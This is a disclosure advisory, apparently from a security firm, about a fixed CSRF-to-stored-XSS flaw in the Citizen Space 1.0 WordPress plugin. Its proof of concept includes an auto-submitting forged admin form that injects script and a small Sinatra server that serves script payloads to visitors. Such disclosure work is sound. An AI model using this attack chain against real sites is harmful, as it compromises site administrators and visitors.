CVSS Summary
| Score | 4.3 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
Advisory:
XSS via CSRF in Citizen Space 1.0
Vulnerability
Last revised:
If an attacker can convince a logged-in admin to visit a page of theirs, they can change the value of the citizenspace_url option via CSRF. That value is then inserted into the same page unescaped (citizenspace.php line 43).
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script>
jQuery(function () {
document.forms[0].submit()
})
</script>
<form action="http://wordpress.local/wp-admin/options-general.php?page=citizenspace" method="POST">
<input type="hidden" name="cs_submit" value="true">
<input type="hidden" name="citizenspace_url" value=""><script>alert(String.fromCharCode(100,120,119))</script>">
</form>
XSS can also be performed against non-logged-in users by using the above method to set the URL to a valid URL you control (I used http://localhost:9999/). Then run the following Sinatra application (ruby exploit.rb -p 9999), and finally direct users to http://example.org/cs_consultation/?path=http://localhost:9999/abc.
require 'sinatra'
get '/api/1.0/citizen_space_version' do
'ok'
end
get '/api/1.0/consult_body' do
'<script>alert("dxw1")</script>'
end
get '/api/1.0/consult_sidebar' do
'<script>alert("dxw2")</script>'
end
Current state: Fixed
Proof of concept
Advisory timeline
Mitigation/further actions
This plugin should be upgraded immediately to version 1.1, which resolves these issues.
Special mention to the vendor, Delib, who responded extremely quickly and released an updated version just a few hours after our report.